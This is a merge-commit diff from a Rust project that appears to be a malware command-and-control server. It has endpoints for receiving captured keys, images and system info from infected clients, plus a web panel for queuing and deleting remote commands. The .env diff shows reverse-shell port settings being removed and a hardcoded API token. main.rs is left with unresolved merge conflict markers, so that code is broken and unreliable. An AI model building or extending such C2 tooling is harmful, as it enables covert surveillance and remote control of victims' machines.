Merge branch 'main' into 'elio-server'

# Conflicts: # c2/Cargo.toml # c2/src/db.rs # c2/src/main.rs

Merge branch 'main' into 'elio-server'
411f008d · leo.muff · 28d29ac0 · bcc21326 · 411f008d · 411f008d
Commit 411f008d authored 1 year ago by leo.muff
--- a/.env
+++ b/.env
 IS_LOADED = 1 # DO NOT REMOVE THIS LINE
 #NEEDED FOR BOTH CLIENT AND SERVER
-ROCKET_ADDRESS = "127.0.0.1"
+ROCKET_ADDRESS = "192.168.122.1"
 ROCKET_PORT = "8888"
 KEY_API = "/keys"
 IMAGE_API= "/images"
@@ -10,8 +10,6 @@ INFO_API = "/info"
 COMMANDS_API="/commands"
 BUFFERMAXLEN = 50
 API_TOKEN = "cbbYrcu6BkM6dSnmzMU0BWZMlxqrIboT"
-SHELL_PORT = "4444"
-SHELL_IP = "127.0.0.1"
 #NEEDED FOR SERVER

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -205,9 +205,7 @@ dependencies = [
 "rocket",
 "rocket_dyn_templates",
 "rocket_sync_db_pools",
- "serde",
 "sharedlib",
- "tera",
 ]
 [[package]]

--- a/c2/Cargo.toml
+++ b/c2/Cargo.toml
@@ -8,9 +8,7 @@ edition = "2021"
 [dependencies]
 sharedlib = {path= "../sharedlib"}
 rocket = { version = "=0.5.0-rc.3", features = ["json"] }
-serde = { version = "1.0", features = ["derive"] }
-tera = "1.0"
-chrono = "0.4.31"
 [dependencies.rocket_sync_db_pools]
 version = "=0.1.0-rc.3"

--- a/c2/src/db.rs
+++ b/c2/src/db.rs
@@ -222,6 +222,7 @@ pub async fn get_command_result(db_conn: &DbConnection, client_id: i32) -> Resul
    Ok(results)
 }
 pub async fn add_image(db_conn: &DbConnection, path: String, client_id : i32) -> Result<(),status::Custom<String>> {
    let image = NewImage {path: path, client_id: client_id};
    db_conn.run(move |conn| {
@@ -238,3 +239,12 @@ pub async fn get_images(db_conn: &DbConnection, client_id : i32) -> Result<Vec<S
        .map_err(|e| status::Custom(Status::InternalServerError, e.to_string()))?;
    Ok(results)
 }
+pub async fn delete_command_by_id(db_conn: &DbConnection, id: i32) -> Result<(),status::Custom<String>>{
+    db_conn.run(move |conn| {
+        diesel::delete(commands::table.filter(commands::id.eq(id))).execute(conn)
+       .map_err(|e| status::Custom(Status::InternalServerError, e.to_string())) // TODO: log this
+    }).await?;
+    Ok(())
+}
--- a/c2/src/main.rs
+++ b/c2/src/main.rs
@@ -3,7 +3,12 @@ use sharedlib::config::load_dotenv;
 use std::sync::Mutex;
 use c2::backup::{DataFile, DataType};
 use c2::server::DbConnection;
-use c2::routes::{home, post_key, get_json_keys, get_html_clients, post_systeminfo, post_new_command, get_json_commands, post_command, get_new_commands, post_image};
+use c2::routes::{
+    home, post_key, get_json_keys, get_html_clients,
+    post_systeminfo, post_new_command, get_json_commands, 
+    post_command, get_new_commands, get_delete_command,
+    post_image
+};
 use rocket_dyn_templates::Template;
 use rocket::fs::FileServer;
@@ -33,7 +38,15 @@ fn rocket() -> _ {
    // load rocket
    let build = rocket::build().attach(DbConnection::fairing()).attach(Template::fairing()); 
    println!("Connecting to database ...");
+<<<<<<< c2/src/main.rs
    build.mount("/", routes![home, post_key, get_json_keys, get_html_clients, post_systeminfo, post_new_command, get_json_commands, post_command, get_new_commands, post_image])
+=======
+    build.mount("/", 
+        routes![home, post_key, get_json_keys, get_html_clients, 
+        post_systeminfo, post_new_command, get_json_commands, 
+        post_command, get_new_commands, get_delete_command
+    ])
+>>>>>>> c2/src/main.rs
    .mount("/static", FileServer::from("c2/templates/static"))
    .mount("/client/data", FileServer::from("./data"))
    .register("/", catchers![not_found, internal_error])

--- a/c2/src/routes.rs
+++ b/c2/src/routes.rs
@@ -103,11 +103,11 @@ pub async fn post_systeminfo(db_conn:DbConnection, auth:ApiClient, sysinfo: Json
 }
 #[post("/newcommand", data="<command>")]
-pub async fn post_new_command(db_conn:DbConnection, command : Form<CommandForm>) -> Result<String,status::Custom<String>> {
+pub async fn post_new_command(db_conn:DbConnection, command : Form<CommandForm>) -> Result<(),status::Custom<String>> {
    add_command(&db_conn, command.into_inner()).await?;
-    Ok(String::from("Command added"))
+    Ok(())
 } 
 #[get("/newcommand/<id>")]
@@ -132,3 +132,9 @@ pub async fn post_command(db_conn:DbConnection, mut result: Json<EncryptedResult
    add_command_result(&db_conn, result.into_inner()).await?;
    Ok(())
 }
+#[get("/deletecommand/<id>")]
+pub async fn get_delete_command(db_conn:DbConnection, id:i32) -> Result<(),status::Custom<String>> {
+    delete_command_by_id(&db_conn, id).await?;
+    Ok(())
+}
\ No newline at end of file
--- a/c2/src/server.rs
+++ b/c2/src/server.rs
@@ -15,6 +15,7 @@ pub struct ApiClient{
    pub socketaddr:SocketAddr
 }
 #[derive(Debug)]
 pub enum ApiAuthError {
    IdError,

--- a/c2/templates/client.html.tera
+++ b/c2/templates/client.html.tera
@@ -40,10 +40,12 @@
        </div>
      </div>
    </div>
-    <h3 class="mt-5" style="text-align:center">Data sent</h3>
+    <div class="mt-4" style="text-align:center">
-    <button class="btn btn-primary" type="button" data-bs-toggle="collapse" data-bs-target="#keys" aria-expanded="false" aria-controls="keys">
+      <h3 class="mt-5">Data sent</h3>
+      <button class="btn btn-outline-dark mb-5" type="button" data-bs-toggle="collapse" data-bs-target="#keys" aria-expanded="false" aria-controls="keys">
        Show keys
      </button>
+    </div>
    <div class="w-75 mx-auto mt-2 collapse" id="keys">
      <table class="table" id="data">
        <thead>

--- a/c2/templates/commands.html.tera
+++ b/c2/templates/commands.html.tera
 {% extends "base" %}
 {% block content %}
-<h3> Send commands </h3>
+<h3 class="mt-4" style="text-align:center"> Send commands </h3>
-<form action="/newcommand" method="post">
+<form id="form" action="#" method="post" class="mt-3" style="text-align:center">
    <label for="command">Choose a command :</label>
    <select id="command" name="command">
        {% for c in commands %}
@@ -10,15 +10,19 @@
    </select>
    <input type="text" placeholder="Option" name=option id="option" />
    <input name="client_id" type="hidden" value={{id}} />
-    <input type="submit" /> 
+    <input type="submit" id="submit" /> 
+    <div id="errorMsg" style="display:none;" class="alert alert-danger w-25 mx-auto mt-3" role="alert">
+        Error sending command
+    </div>
 </form>
-<h3> Pending commands </h3>
+<h3 class="mt-4" style="text-align:center"> Pending commands </h3>
-<table class="table">
+<table class="table w-50 border mx-auto mt-3">
    <thead>
        <tr>
            <th scope="col">Id</th>
            <th scope="col">Command</th>
            <th scope="col">Option</th>
+            <th></th>
        </tr>
    </thead>
    <tbody>
@@ -27,12 +31,17 @@
                <th scope="row">{{loop.index}}</th>
                <td class="mw-20">{{commands[command.command]}}</td>
                <td>{{command.option}}</td>
+                <td>
+                    <div style="text-align:right">
+                        <button class="m-2 mb-4 text-center btn btn-secondary active" value="{{command.id}}" id="delete"> Delete Command </button>
+                    </div>
+                </td>
            </tr>
        {% endfor %}
    </tbody>
 </table>
-<h3> Commands results </h3>
+<h3 class="mt-4" style="text-align:center"> Commands results </h3>
-<table class="table">
+<table class="table w-75 border mx-auto mt-3">
    <thead>
        <tr>
            <th scope="col">Id</th>
@@ -51,3 +60,38 @@
    </tbody>
 </table>
 {% endblock content %}
+{% block scripts %}
+  <script src="/static/jquery/jquery-3.7.0.min.js"></script>
+  <script src="/static/bootstrap/js/bootstrap.min.js" crossorigin="anonymous"></script>
+  <script>
+    $(document).ready(function(){
+        $('#form').submit(function(e){
+            e.preventDefault();
+            $.ajax({
+                url: '/newcommand',
+                type : 'post',
+                data : $('#form').serialize(),
+                success : function(){
+                    location.reload(true);
+                },
+                error : function(){
+                    $("#errorMsg").show();
+                }
+            });
+        });
+        $('#delete').click(function(e){
+            e.preventDefault();
+            $.ajax({
+                url: '/deletecommand/'+ document.querySelector('#delete').value,
+                type: 'get',
+                success:function(){
+                    location.reload(true);
+                }
+            });
+        });
+    });
+  </script>
+{% endblock scripts %}
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.css
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.css
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.css.map
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.css.map
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.min.css
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.min.css
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.min.css.map
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.min.css.map
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.css
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.css
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.css.map
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.css.map
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.min.css
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.min.css
--- a/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.min.css.map
+++ b/c2/templates/static/bootstrap/css/bootstrap-grid.rtl.min.css.map
--- a/c2/templates/static/bootstrap/css/bootstrap-reboot.css
+++ b/c2/templates/static/bootstrap/css/bootstrap-reboot.css
--- a/c2/templates/static/bootstrap/css/bootstrap-reboot.css.map
+++ b/c2/templates/static/bootstrap/css/bootstrap-reboot.css.map
--- a/c2/templates/static/bootstrap/css/bootstrap-reboot.min.css
+++ b/c2/templates/static/bootstrap/css/bootstrap-reboot.min.css